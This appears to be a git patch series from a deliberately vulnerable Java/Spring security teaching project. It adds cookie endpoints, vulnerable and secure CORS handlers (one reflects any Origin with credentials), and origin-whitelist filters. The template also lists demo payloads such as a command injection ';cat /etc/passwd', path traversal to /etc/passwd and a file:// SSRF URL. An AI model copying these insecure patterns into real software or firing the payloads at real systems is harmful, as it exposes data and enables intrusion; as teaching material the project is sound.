Subject: [PATCH 065/108] add xxe return back filecontent

---
 .../java/org/joychou/controller/Cookies.java  | 81 +++++++++++++++++++
 .../joychou/controller/jsonp/JSONPAdvice.java |  4 +-
 src/main/java/org/joychou/util/WebUtils.java  |  6 ++
 3 files changed, 90 insertions(+), 1 deletion(-)
 create mode 100644 src/main/java/org/joychou/controller/Cookies.java

diff --git a/src/main/java/org/joychou/controller/Cookies.java b/src/main/java/org/joychou/controller/Cookies.java
new file mode 100644
index 00000000..5a32b191
--- /dev/null
+++ b/src/main/java/org/joychou/controller/Cookies.java
@@ -0,0 +1,81 @@
+package org.joychou.controller;
+
+import org.springframework.web.bind.annotation.CookieValue;
+import org.springframework.web.bind.annotation.RequestMapping;
+
+import javax.servlet.http.Cookie;
+import javax.servlet.http.HttpServletRequest;
+import org.joychou.util.WebUtils;
+import org.springframework.web.bind.annotation.RestController;
+import static org.springframework.web.util.WebUtils.getCookie;
+
+@RestController
+@RequestMapping("/cookie")
+public class Cookies {
+
+    private static String NICK = "nick";
+
+    @RequestMapping(value = "/vuln01")
+    private String vuln01(HttpServletRequest req) {
+        String nick = WebUtils.getCookieValueByName(req, NICK); // key code
+        return "Cookie nick: " + nick;
+    }
+
+
+    @RequestMapping(value = "/vuln02")
+    private String vuln02(HttpServletRequest req) {
+        String nick = null;
+        Cookie[] cookie = req.getCookies();
+
+        if (cookie != null) {
+            nick = getCookie(req, NICK).getValue();  // key code
+        }
+
+        return "Cookie nick: " + nick;
+    }
+
+
+    @RequestMapping(value = "/vuln03")
+    private String vuln03(HttpServletRequest req) {
+        String nick = null;
+        Cookie cookies[] = req.getCookies();
+        if (cookies != null) {
+            for (Cookie cookie : cookies) {
+                // key code. Equals can also be equalsIgnoreCase.
+                if (NICK.equals(cookie.getName())) {
+                    nick =  cookie.getValue();
+                }
+            }
+        }
+        return "Cookie nick: " + nick;
+    }
+
+
+    @RequestMapping(value = "/vuln04")
+    private String vuln04(HttpServletRequest req) {
+        String nick = null;
+        Cookie cookies[] = req.getCookies();
+        if (cookies != null) {
+            for (Cookie cookie : cookies) {
+                if (cookie.getName().equalsIgnoreCase(NICK)) {  // key code
+                    nick =  cookie.getValue();
+                }
+            }
+        }
+        return "Cookie nick: " + nick;
+    }
+
+
+
+    @RequestMapping(value = "/vuln05")
+    private String vuln05(@CookieValue("nick") String nick) {
+        return "Cookie nick: " + nick;
+    }
+
+
+    @RequestMapping(value = "/vuln06")
+    private String vuln06(@CookieValue(value = "nick") String nick) {
+        return "Cookie nick: " + nick;
+    }
+
+}
diff --git a/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java b/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java
index f6c591f6..5463a5a5 100644
--- a/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java
+++ b/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java
@@ -4,7 +4,9 @@
 import org.springframework.web.bind.annotation.ControllerAdvice;
 import org.springframework.web.servlet.mvc.method.annotation.AbstractJsonpResponseBodyAdvice;
 
-
+// AbstractJsonpResponseBodyAdvice will be removed as of Spring Framework 5.1, use CORS instead.
+// Since Spring Framework 4.1
+// Springboot 2.1.0 RELEASE use spring framework 5.1.2
 @ControllerAdvice
 public class JSONPAdvice extends AbstractJsonpResponseBodyAdvice {
 
diff --git a/src/main/java/org/joychou/util/WebUtils.java b/src/main/java/org/joychou/util/WebUtils.java
index 21cdcd53..685340c6 100644
--- a/src/main/java/org/joychou/util/WebUtils.java
+++ b/src/main/java/org/joychou/util/WebUtils.java
@@ -1,5 +1,6 @@
 package org.joychou.util;
 
+import javax.servlet.http.Cookie;
 import javax.servlet.http.HttpServletRequest;
 import java.io.IOException;
 import java.io.InputStream;
@@ -17,4 +18,9 @@ public static String convertStreamToString(java.io.InputStream is) {
         java.util.Scanner s = new java.util.Scanner(is).useDelimiter("\\A");
         return s.hasNext() ? s.next() : "";
     }
+
+    public static String getCookieValueByName(HttpServletRequest request, String cookieName) {
+        Cookie cookie = org.springframework.web.util.WebUtils.getCookie(request, cookieName);
+        return cookie == null ? null : cookie.getValue();
+    }
 }

From 22f0ecda9a220173a738e73ed55a748f6ad7e7b6 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Mon, 9 Dec 2019 22:56:39 +0800
Subject: [PATCH 066/108] add cors security code

---
 java-sec-code.iml                             |  4 +-
 pom.xml                                       |  2 +-
 .../java/org/joychou/config/CorsConfig.java   | 29 +++++++++++++
 .../java/org/joychou/config/CorsConfig2.java  | 28 +++++++++++++
 .../java/org/joychou/controller/CORS.java     | 41 ++++++++++++++++---
 .../org/joychou/filter/SecCorsFilter.java     | 36 ++++++++++++++++
 .../joychou/security/WebSecurityConfig.java   | 28 +++++++++++++
 7 files changed, 159 insertions(+), 9 deletions(-)
 create mode 100644 src/main/java/org/joychou/config/CorsConfig.java
 create mode 100644 src/main/java/org/joychou/config/CorsConfig2.java
 create mode 100644 src/main/java/org/joychou/filter/SecCorsFilter.java

diff --git a/java-sec-code.iml b/java-sec-code.iml
index 0140638a..5a12be26 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -181,8 +181,8 @@
     <orderEntry type="library" name="Maven: xmlpull:xmlpull:1.1.3.1" level="project" />
     <orderEntry type="library" name="Maven: xpp3:xpp3_min:1.1.4c" level="project" />
     <orderEntry type="library" name="Maven: org.apache.poi:poi:3.10-FINAL" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.poi:poi-ooxml:3.10-FINAL" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.poi:poi-ooxml-schemas:3.10-FINAL" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.poi:poi-ooxml:3.9" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.poi:poi-ooxml-schemas:3.9" level="project" />
     <orderEntry type="library" name="Maven: org.apache.xmlbeans:xmlbeans:2.3.0" level="project" />
     <orderEntry type="library" name="Maven: dom4j:dom4j:1.6.1" level="project" />
     <orderEntry type="library" name="Maven: com.monitorjbl:xlsx-streamer:2.0.0" level="project" />
diff --git a/pom.xml b/pom.xml
index 65c1d5bf..dd14d9ed 100644
--- a/pom.xml
+++ b/pom.xml
@@ -206,7 +206,7 @@
         <dependency>
             <groupId>org.apache.poi</groupId>
             <artifactId>poi-ooxml</artifactId>
-            <version>3.10-FINAL</version>
+            <version>3.9</version> <!-- 3.10-FINAL -->
         </dependency>
 
         <dependency>
diff --git a/src/main/java/org/joychou/config/CorsConfig.java b/src/main/java/org/joychou/config/CorsConfig.java
new file mode 100644
index 00000000..8125e518
--- /dev/null
+++ b/src/main/java/org/joychou/config/CorsConfig.java
@@ -0,0 +1,29 @@
+package org.joychou.config;
+
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.Configuration;
+import org.springframework.web.servlet.config.annotation.CorsRegistry;
+import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;
+import org.springframework.web.servlet.config.annotation.WebMvcConfigurerAdapter;
+
+
+@Configuration
+public class CorsConfig
+{
+    @Bean
+    public WebMvcConfigurer corsConfigurer()
+    {
+        return new WebMvcConfigurerAdapter() {
+            @Override
+            public void addCorsMappings(CorsRegistry registry) {
+                // 设置cors origin白名单。区分http和https，并且默认不会拦截同域请求。
+                String[] allowOrigins = {"http://test.joychou.org", "https://test.joychou.org"};
+
+                registry.addMapping("/cors/sec/webMvcConfigurer")
+                        .allowedOrigins(allowOrigins)
+                        .allowedMethods("GET", "POST")
+                        .allowCredentials(true);
+            }
+        };
+    }
+}
\ No newline at end of file
diff --git a/src/main/java/org/joychou/config/CorsConfig2.java b/src/main/java/org/joychou/config/CorsConfig2.java
new file mode 100644
index 00000000..97b9b59e
--- /dev/null
+++ b/src/main/java/org/joychou/config/CorsConfig2.java
@@ -0,0 +1,28 @@
+//package org.joychou.config;
+//
+//import org.springframework.boot.web.servlet.FilterRegistrationBean;
+//import org.springframework.context.annotation.Bean;
+//import org.springframework.context.annotation.Configuration;
+//import org.springframework.web.cors.CorsConfiguration;
+//import org.springframework.web.cors.UrlBasedCorsConfigurationSource;
+//import org.springframework.web.filter.CorsFilter;
+//
+//@Configuration
+//public class CorsConfig2 {
+//
+//    @Bean
+//    public FilterRegistrationBean corsFilter() {
+//        UrlBasedCorsConfigurationSource source = new UrlBasedCorsConfigurationSource();
+//        CorsConfiguration config = new CorsConfiguration();
+//        config.setAllowCredentials(true);
+//        config.addAllowedOrigin("http://test.joychou.org");
+//        config.addAllowedOrigin("https://test.joychou.org");
+//        config.addAllowedHeader("*");
+//        config.addAllowedMethod("GET");
+//        config.addAllowedMethod("POST");
+//        source.registerCorsConfiguration("/cors/getCsrfToken/sec_03", config);
+//        FilterRegistrationBean bean = new FilterRegistrationBean(new CorsFilter(source));
+//        bean.setOrder(0);
+//        return bean;
+//    }
+//}
diff --git a/src/main/java/org/joychou/controller/CORS.java b/src/main/java/org/joychou/controller/CORS.java
index 35d2a178..ec8c581c 100644
--- a/src/main/java/org/joychou/controller/CORS.java
+++ b/src/main/java/org/joychou/controller/CORS.java
@@ -1,6 +1,7 @@
 package org.joychou.controller;
 
 import org.joychou.security.SecurityUtil;
+import org.springframework.security.web.csrf.CsrfToken;
 import org.springframework.web.bind.annotation.CrossOrigin;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.joychou.controller.jsonp.JSONP;
@@ -22,31 +23,59 @@ public class CORS {
     protected static String info = "{\"name\": \"JoyChou\", \"phone\": \"18200001111\"}";
     protected static String[] urlwhitelist = {"joychou.com", "joychou.me"};
 
-    @RequestMapping("/vuls1")
+    @RequestMapping("/vuln/origin")
     private static String vuls1(HttpServletRequest request, HttpServletResponse response) {
-        // 获取Header中的Origin
         String origin = request.getHeader("origin");
         response.setHeader("Access-Control-Allow-Origin", origin); // 设置Origin值为Header中获取到的
         response.setHeader("Access-Control-Allow-Credentials", "true");  // cookie
         return info;
     }
 
-    @RequestMapping("/vuls2")
+    @RequestMapping("/vuln/setHeader")
     private static String vuls2(HttpServletResponse response) {
-        // 不建议设置为*
         // 后端设置Access-Control-Allow-Origin为*的情况下，跨域的时候前端如果设置withCredentials为true会异常
         response.setHeader("Access-Control-Allow-Origin", "*");
         return info;
     }
 
+
     @CrossOrigin("*")
-    @RequestMapping("/vuls3")
+    @RequestMapping("/vuln/crossOrigin")
     private static String vuls3(HttpServletResponse response) {
         return info;
     }
 
 
-    @RequestMapping("/sec")
+    /**
+     * http://localhost:8080/cors/sec/webMvcConfigurer
+     * https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/config/webMvcConfigurer.java
+     */
+    @RequestMapping("/sec/webMvcConfigurer")
+    public CsrfToken getCsrfToken_01(CsrfToken token) {
+        return token;
+    }
+
+
+    /**
+     * https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/security/WebSecurityConfig.java
+     */
+    @RequestMapping("/sec/httpCors")
+    public CsrfToken getCsrfToken_02(CsrfToken token) {
+        return token;
+    }
+
+
+    /**
+     * https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/filter/SecCorsFilter.java
+     */
+    @RequestMapping("/sec/corsFitler")
+    public CsrfToken getCsrfToken_03(CsrfToken token) {
+        return token;
+    }
+
+
+    // http://localhost:8080/cors/sec/checkOrigin
+    @RequestMapping("/sec/checkOrigin")
     public String seccode(HttpServletRequest request, HttpServletResponse response) {
         String origin = request.getHeader("Origin");
 
diff --git a/src/main/java/org/joychou/filter/SecCorsFilter.java b/src/main/java/org/joychou/filter/SecCorsFilter.java
new file mode 100644
index 00000000..67493cb0
--- /dev/null
+++ b/src/main/java/org/joychou/filter/SecCorsFilter.java
@@ -0,0 +1,36 @@
+package org.joychou.filter;
+
+import org.springframework.core.Ordered;
+import org.springframework.core.annotation.Order;
+import org.springframework.stereotype.Component;
+import org.springframework.web.cors.CorsConfiguration;
+import org.springframework.web.cors.UrlBasedCorsConfigurationSource;
+import org.springframework.web.filter.CorsFilter;
+
+/**
+ * 由于CorsFilter和spring security冲突，所以改为下面的代码。
+ * CorsFilter可以参考config/CorsConfig2的代码。
+ */
+@Component
+@Order(Ordered.HIGHEST_PRECEDENCE)
+public class SecCorsFilter extends CorsFilter {
+
+    public SecCorsFilter() {
+        super(configurationSource());
+    }
+
+    private static UrlBasedCorsConfigurationSource configurationSource() {
+        CorsConfiguration config = new CorsConfiguration();
+        config.setAllowCredentials(true);
+        config.addAllowedOrigin("http://test.joychou.org");
+        config.addAllowedOrigin("https://test.joychou.org");
+        config.addAllowedHeader("*");
+        config.addAllowedMethod("GET");
+        config.addAllowedMethod("POST");
+
+        UrlBasedCorsConfigurationSource source = new UrlBasedCorsConfigurationSource();
+        source.registerCorsConfiguration("/cors/sec/corsFitler", config);
+
+        return source;
+    }
+}
\ No newline at end of file
diff --git a/src/main/java/org/joychou/security/WebSecurityConfig.java b/src/main/java/org/joychou/security/WebSecurityConfig.java
index 127115f3..684e5513 100644
--- a/src/main/java/org/joychou/security/WebSecurityConfig.java
+++ b/src/main/java/org/joychou/security/WebSecurityConfig.java
@@ -2,6 +2,7 @@
 
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.beans.factory.annotation.Value;
+import org.springframework.context.annotation.Bean;
 import org.springframework.context.annotation.Configuration;
 import org.springframework.security.config.annotation.authentication.builders.AuthenticationManagerBuilder;
 import org.springframework.security.config.annotation.web.builders.HttpSecurity;
@@ -9,7 +10,12 @@
 import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;
 import org.springframework.security.web.csrf.CookieCsrfTokenRepository;
 import org.springframework.security.web.util.matcher.RequestMatcher;
+import org.springframework.web.cors.CorsConfiguration;
+import org.springframework.web.cors.CorsConfigurationSource;
+import org.springframework.web.cors.UrlBasedCorsConfigurationSource;
+
 import javax.servlet.http.HttpServletRequest;
+import java.util.ArrayList;
 import java.util.Arrays;
 import java.util.HashSet;
 
@@ -58,6 +64,8 @@ protected void configure(HttpSecurity http) throws Exception {
         http.exceptionHandling().accessDeniedHandler(new CsrfAccessDeniedHandler());
         // http.csrf().csrfTokenRepository(CookieCsrfTokenRepository.withHttpOnlyFalse());
 
+        http.cors();
+
         // spring security login settings
         http.authorizeRequests()
                 .antMatchers("/css/**", "/js/**").permitAll() // permit static resources
@@ -69,6 +77,26 @@ protected void configure(HttpSecurity http) throws Exception {
                 .rememberMe(); // tomcat默认JSESSION会话有效时间为30分钟，所以30分钟不操作会话将过期。为了解决这一问题，引入rememberMe功能。
     }
 
+    /**
+     * Global cors configure
+     */
+    @Bean
+    CorsConfigurationSource corsConfigurationSource()
+    {
+        // Set cors origin white list
+        ArrayList<String> allowOrigins = new ArrayList<String>();
+        allowOrigins.add("http://test.joychou.org");
+        allowOrigins.add("https://test.joychou.org"); // 区分http和https，并且默认不会拦截同域请求。
+
+        CorsConfiguration configuration = new CorsConfiguration();
+        configuration.setAllowedOrigins(allowOrigins);
+        configuration.setAllowCredentials(true);
+        configuration.setAllowedMethods(Arrays.asList("GET", "POST"));
+        UrlBasedCorsConfigurationSource source = new UrlBasedCorsConfigurationSource();
+        source.registerCorsConfiguration("/cors/sec/httpCors", configuration); // ant style
+        return source;
+    }
+
     @Autowired
     public void configureGlobal(AuthenticationManagerBuilder auth) throws Exception {
         auth

From 6ae05278b38328cead4e293894f4efab6713cc11 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Thu, 19 Dec 2019 19:50:00 +0800
Subject: [PATCH 067/108] add filter cors fix code

---
 .../java/org/joychou/config/CorsConfig2.java  |  1 +
 .../controller/{CORS.java => Cors.java}       | 24 ++++----
 .../org/joychou/controller/URLRedirect.java   |  2 +-
 .../org/joychou/controller/jsonp/JSONP.java   |  4 +-
 .../{security => filter}/HttpFilter.java      |  9 ++-
 .../java/org/joychou/filter/OriginFilter.java | 59 +++++++++++++++++++
 .../org/joychou/security/SecurityUtil.java    | 18 +++---
 src/main/resources/templates/index.html       |  1 +
 8 files changed, 91 insertions(+), 27 deletions(-)
 rename src/main/java/org/joychou/controller/{CORS.java => Cors.java} (84%)
 rename src/main/java/org/joychou/{security => filter}/HttpFilter.java (88%)
 create mode 100644 src/main/java/org/joychou/filter/OriginFilter.java

diff --git a/src/main/java/org/joychou/config/CorsConfig2.java b/src/main/java/org/joychou/config/CorsConfig2.java
index 97b9b59e..382f6ba7 100644
--- a/src/main/java/org/joychou/config/CorsConfig2.java
+++ b/src/main/java/org/joychou/config/CorsConfig2.java
@@ -7,6 +7,7 @@
 //import org.springframework.web.cors.UrlBasedCorsConfigurationSource;
 //import org.springframework.web.filter.CorsFilter;
 //
+//// https://spring.io/blog/2015/06/08/cors-support-in-spring-framework
 //@Configuration
 //public class CorsConfig2 {
 //
diff --git a/src/main/java/org/joychou/controller/CORS.java b/src/main/java/org/joychou/controller/Cors.java
similarity index 84%
rename from src/main/java/org/joychou/controller/CORS.java
rename to src/main/java/org/joychou/controller/Cors.java
index ec8c581c..db526a72 100644
--- a/src/main/java/org/joychou/controller/CORS.java
+++ b/src/main/java/org/joychou/controller/Cors.java
@@ -18,7 +18,7 @@
 
 @RestController
 @RequestMapping("/cors")
-public class CORS {
+public class Cors {
 
     protected static String info = "{\"name\": \"JoyChou\", \"phone\": \"18200001111\"}";
     protected static String[] urlwhitelist = {"joychou.com", "joychou.me"};
@@ -46,34 +46,34 @@ private static String vuls3(HttpServletResponse response) {
     }
 
 
-    /**
-     * http://localhost:8080/cors/sec/webMvcConfigurer
-     * https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/config/webMvcConfigurer.java
-     */
+    // https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/config/webMvcConfigurer.java
     @RequestMapping("/sec/webMvcConfigurer")
     public CsrfToken getCsrfToken_01(CsrfToken token) {
         return token;
     }
 
 
-    /**
-     * https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/security/WebSecurityConfig.java
-     */
+    // https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/security/WebSecurityConfig.java
     @RequestMapping("/sec/httpCors")
     public CsrfToken getCsrfToken_02(CsrfToken token) {
         return token;
     }
 
 
-    /**
-     * https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/filter/SecCorsFilter.java
-     */
+    // https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/filter/SecCorsFilter.java
     @RequestMapping("/sec/corsFitler")
     public CsrfToken getCsrfToken_03(CsrfToken token) {
         return token;
     }
 
 
+    // https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/filter/CorsFilter.java
+    @RequestMapping("/sec/Filter")
+    public CsrfToken getCsrfToken_04(CsrfToken token) {
+        return token;
+    }
+
+
     // http://localhost:8080/cors/sec/checkOrigin
     @RequestMapping("/sec/checkOrigin")
     public String seccode(HttpServletRequest request, HttpServletResponse response) {
@@ -81,7 +81,7 @@ public String seccode(HttpServletRequest request, HttpServletResponse response)
 
         // 如果origin不为空并且origin不在白名单内，认定为不安全。
         // 如果origin为空，表示是同域过来的请求或者浏览器直接发起的请求。
-        if ( origin != null && !SecurityUtil.checkURLbyEndsWith(origin, urlwhitelist) ) {
+        if ( origin != null && SecurityUtil.checkURLbyEndsWith(origin, urlwhitelist) == null ) {
             return "Origin is not safe.";
         }
         response.setHeader("Access-Control-Allow-Origin", origin);
diff --git a/src/main/java/org/joychou/controller/URLRedirect.java b/src/main/java/org/joychou/controller/URLRedirect.java
index 26fc1652..dfd220f2 100644
--- a/src/main/java/org/joychou/controller/URLRedirect.java
+++ b/src/main/java/org/joychou/controller/URLRedirect.java
@@ -82,7 +82,7 @@ public static void forward(HttpServletRequest request, HttpServletResponse respo
     public static void sendRedirect_seccode(HttpServletRequest request, HttpServletResponse response) throws IOException{
         String url = request.getParameter("url");
         String urlwhitelist[] = {"joychou.org", "joychou.com"};
-        if (!SecurityUtil.checkURLbyEndsWith(url, urlwhitelist)) {
+        if (SecurityUtil.checkURLbyEndsWith(url, urlwhitelist) == null) {
             // Redirect to error page.
             response.sendRedirect("https://test.joychou.org/error3.html");
             return;
diff --git a/src/main/java/org/joychou/controller/jsonp/JSONP.java b/src/main/java/org/joychou/controller/jsonp/JSONP.java
index 34980530..a5c9072f 100644
--- a/src/main/java/org/joychou/controller/jsonp/JSONP.java
+++ b/src/main/java/org/joychou/controller/jsonp/JSONP.java
@@ -62,7 +62,7 @@ private String referer(HttpServletRequest request) {
     private String emptyReferer(HttpServletRequest request) {
         String referer = request.getHeader("referer");
 
-        if (null != referer && !SecurityUtil.checkURLbyEndsWith(referer, urlwhitelist)) {
+        if (null != referer && SecurityUtil.checkURLbyEndsWith(referer, urlwhitelist) == null) {
             return "error";
         }
 
@@ -108,7 +108,7 @@ public ModelAndView mappingJackson2JsonView(HttpServletRequest req) {
     private String safecode(HttpServletRequest request) {
         String referer = request.getHeader("referer");
 
-        if (!SecurityUtil.checkURLbyEndsWith(referer, urlwhitelist)) {
+        if (SecurityUtil.checkURLbyEndsWith(referer, urlwhitelist) == null) {
             return "error";
         }
 
diff --git a/src/main/java/org/joychou/security/HttpFilter.java b/src/main/java/org/joychou/filter/HttpFilter.java
similarity index 88%
rename from src/main/java/org/joychou/security/HttpFilter.java
rename to src/main/java/org/joychou/filter/HttpFilter.java
index 2d6354e7..83b4ea13 100644
--- a/src/main/java/org/joychou/security/HttpFilter.java
+++ b/src/main/java/org/joychou/filter/HttpFilter.java
@@ -1,4 +1,4 @@
-package org.joychou.security;
+package org.joychou.filter;
 
 
 import javax.servlet.*;
@@ -9,6 +9,7 @@
 
 import org.apache.commons.lang.StringUtils;
 import org.joychou.config.WebConfig;
+import org.joychou.security.SecurityUtil;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 import org.springframework.util.AntPathMatcher;
@@ -30,7 +31,7 @@ public void init(FilterConfig filterConfig) throws ServletException {
 
     }
 
-    private final Logger logger= LoggerFactory.getLogger(HttpFilter.class);
+    private final Logger logger= LoggerFactory.getLogger(this.getClass());
 
     @Override
     public void doFilter(ServletRequest req, ServletResponse res, FilterChain filterChain)
@@ -49,13 +50,15 @@ public void doFilter(ServletRequest req, ServletResponse res, FilterChain filter
             }
         }
 
+        // logger.info("[+] Referer: " + refer);
+
         if (isMatch) {
             if (WebConfig.getReferSecEnabled()) {
                 // Check referer for all GET requests with callback parameters.
                 for (String callback: WebConfig.getCallbacks()) {
                     if (request.getMethod().equals("GET") && StringUtils.isNotBlank(request.getParameter(callback)) ){
                         // If the check of referer fails, a 403 forbidden error page will be returned.
-                        if (!SecurityUtil.checkURLbyEndsWith(refer, WebConfig.getReferWhitelist())){
+                        if (SecurityUtil.checkURLbyEndsWith(refer, WebConfig.getReferWhitelist()) == null ){
                             logger.info("[-] URL: " + request.getRequestURL() + "?" + request.getQueryString() + "\t"
                                     + "Referer: " + refer);
                             response.sendRedirect("https://test.joychou.org/error3.html");
diff --git a/src/main/java/org/joychou/filter/OriginFilter.java b/src/main/java/org/joychou/filter/OriginFilter.java
new file mode 100644
index 00000000..5f10c1a1
--- /dev/null
+++ b/src/main/java/org/joychou/filter/OriginFilter.java
@@ -0,0 +1,59 @@
+package org.joychou.filter;
+
+
+import javax.servlet.*;
+import javax.servlet.annotation.WebFilter;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import java.io.IOException;
+
+import org.joychou.security.SecurityUtil;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+
+/**
+ * 推荐使用该全局方案修复Cors跨域漏洞，因为可以校验一级域名。
+ * @author JoyChou @ 2019.12.19
+ *
+ */
+
+@WebFilter(filterName = "OriginFilter", urlPatterns = "/cors/sec/Filter")
+public class OriginFilter implements Filter {
+
+    private static String[] urlwhitelist = {"joychou.org", "joychou.me"};
+
+    @Override
+    public void init(FilterConfig filterConfig) throws ServletException {
+
+    }
+
+    private final Logger logger= LoggerFactory.getLogger(this.getClass());
+
+    @Override
+    public void doFilter(ServletRequest req, ServletResponse res, FilterChain filterChain)
+            throws IOException, ServletException {
+
+        HttpServletRequest request = (HttpServletRequest)req;
+        HttpServletResponse response = (HttpServletResponse)res;
+
+        String origin = request.getHeader("Origin");
+        logger.info("[+] Origin: " + origin + "\tCurrent url:" + request.getRequestURL());
+
+        // 以file协议访问html，origin为字符串的null，所以依然会走安全check逻辑
+        if ( origin != null && SecurityUtil.checkURLbyEndsWith(origin, urlwhitelist) == null) {
+            logger.error("[-] Origin check error.");
+            return;
+        }
+
+        response.setHeader("Access-Control-Allow-Origin", origin);
+        response.setHeader("Access-Control-Allow-Credentials", "true");
+        response.setHeader("Access-Control-Allow-Methods", "GET, POST, OPTION");
+
+        filterChain.doFilter(req, res);
+    }
+
+    @Override
+    public void destroy() {
+
+    }
+}
diff --git a/src/main/java/org/joychou/security/SecurityUtil.java b/src/main/java/org/joychou/security/SecurityUtil.java
index 65681836..48573454 100644
--- a/src/main/java/org/joychou/security/SecurityUtil.java
+++ b/src/main/java/org/joychou/security/SecurityUtil.java
@@ -18,29 +18,29 @@ public class SecurityUtil {
      *
      * @param url 需要check的url
      * @param urlwhitelist url白名单list
-     * @return 安全url返回true，危险url返回false
+     * @return 安全url返回url，危险url返回null
      */
-    public static Boolean checkURLbyEndsWith(String url, String[] urlwhitelist) {
+    public static String checkURLbyEndsWith(String url, String[] urlwhitelist) {
         if (null == url) {
-            return false;
+            return null;
         }
         try {
             URI uri = new URI(url);
 
             if (!url.startsWith("http://") && !url.startsWith("https://")) {
-                return false;
+                return null;
             }
 
             String host = uri.getHost().toLowerCase();
             for (String whitelist: urlwhitelist){
                 if (host.endsWith("." + whitelist)) {
-                    return true;
+                    return url;
                 }
             }
 
-            return false;
+            return null;
         } catch (Exception e) {
-            return false;
+            return null;
         }
     }
 
@@ -75,9 +75,9 @@ public static boolean checkSSRFWithoutRedirect(String url) {
      *
      * @param url The url that needs to check.
      * @param hostWlist host whitelist
-     * @return Safe url returns true. Dangerous url returns false.
+     * @return Safe url returns url. Dangerous url returns null.
      */
-    public static boolean checkSSRFByHostWlist(String url, String[] hostWlist) {
+    public static String checkSSRFByHostWlist(String url, String[] hostWlist) {
         return checkURLbyEndsWith(url, hostWlist);
     }
 
diff --git a/src/main/resources/templates/index.html b/src/main/resources/templates/index.html
index e3a3d25e..b57838db 100644
--- a/src/main/resources/templates/index.html
+++ b/src/main/resources/templates/index.html
@@ -10,6 +10,7 @@
     <p>
         <a th:href="@{/codeinject?filepath=/tmp;cat /etc/passwd}">CmdInject</a>&nbsp;&nbsp;
         <a th:href="@{/jsonp/getToken?_callback=test}">JSONP</a>&nbsp;&nbsp;
+        <a th:href="@{cors/sec/Filter}">Cors</a>&nbsp;&nbsp;
         <a th:href="@{/path_traversal/vul?filepath=../../../../../etc/passwd}">PathTraversal</a>&nbsp;&nbsp;
         <a th:href="@{/sqli/jdbc/vul?username=joychou}">SqlInject</a>&nbsp;&nbsp;
         <a th:href="@{/ssrf/urlConnection?url=file:///etc/passwd}">SSRF</a>&nbsp;&nbsp;

From 85eb3b9cc51ee43bc410debacd2c18cd1c1375ed Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Thu, 26 Dec 2019 23:28:41 +0800
Subject: [PATCH 068/108] update cors security code

---
 .../java/org/joychou/config/CorsConfig.java   | 29 ---------
 .../java/org/joychou/config/CorsConfig2.java  |  2 +-
 .../org/joychou/config/CustomCorsConfig.java  | 49 +++++++++++++++
 .../java/org/joychou/controller/Cors.java     | 57 +++++++++++++-----
 ...SecCorsFilter.java => BaseCorsFilter.java} | 11 ++--
 .../java/org/joychou/filter/OriginFilter.java | 11 ++--
 .../joychou/security/CustomCorsProcessor.java | 60 +++++++++++++++++++
 .../joychou/security/WebSecurityConfig.java   |  6 +-
 src/main/resources/templates/index.html       |  2 +-
 9 files changed, 168 insertions(+), 59 deletions(-)
 delete mode 100644 src/main/java/org/joychou/config/CorsConfig.java
 create mode 100644 src/main/java/org/joychou/config/CustomCorsConfig.java
 rename src/main/java/org/joychou/filter/{SecCorsFilter.java => BaseCorsFilter.java} (74%)
 create mode 100644 src/main/java/org/joychou/security/CustomCorsProcessor.java

diff --git a/src/main/java/org/joychou/config/CorsConfig.java b/src/main/java/org/joychou/config/CorsConfig.java
deleted file mode 100644
index 8125e518..00000000
--- a/src/main/java/org/joychou/config/CorsConfig.java
+++ /dev/null
@@ -1,29 +0,0 @@
-package org.joychou.config;
-
-import org.springframework.context.annotation.Bean;
-import org.springframework.context.annotation.Configuration;
-import org.springframework.web.servlet.config.annotation.CorsRegistry;
-import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;
-import org.springframework.web.servlet.config.annotation.WebMvcConfigurerAdapter;
-
-
-@Configuration
-public class CorsConfig
-{
-    @Bean
-    public WebMvcConfigurer corsConfigurer()
-    {
-        return new WebMvcConfigurerAdapter() {
-            @Override
-            public void addCorsMappings(CorsRegistry registry) {
-                // 设置cors origin白名单。区分http和https，并且默认不会拦截同域请求。
-                String[] allowOrigins = {"http://test.joychou.org", "https://test.joychou.org"};
-
-                registry.addMapping("/cors/sec/webMvcConfigurer")
-                        .allowedOrigins(allowOrigins)
-                        .allowedMethods("GET", "POST")
-                        .allowCredentials(true);
-            }
-        };
-    }
-}
\ No newline at end of file
diff --git a/src/main/java/org/joychou/config/CorsConfig2.java b/src/main/java/org/joychou/config/CorsConfig2.java
index 382f6ba7..6c1a8ef8 100644
--- a/src/main/java/org/joychou/config/CorsConfig2.java
+++ b/src/main/java/org/joychou/config/CorsConfig2.java
@@ -26,4 +26,4 @@
 //        bean.setOrder(0);
 //        return bean;
 //    }
-//}
+//}
\ No newline at end of file
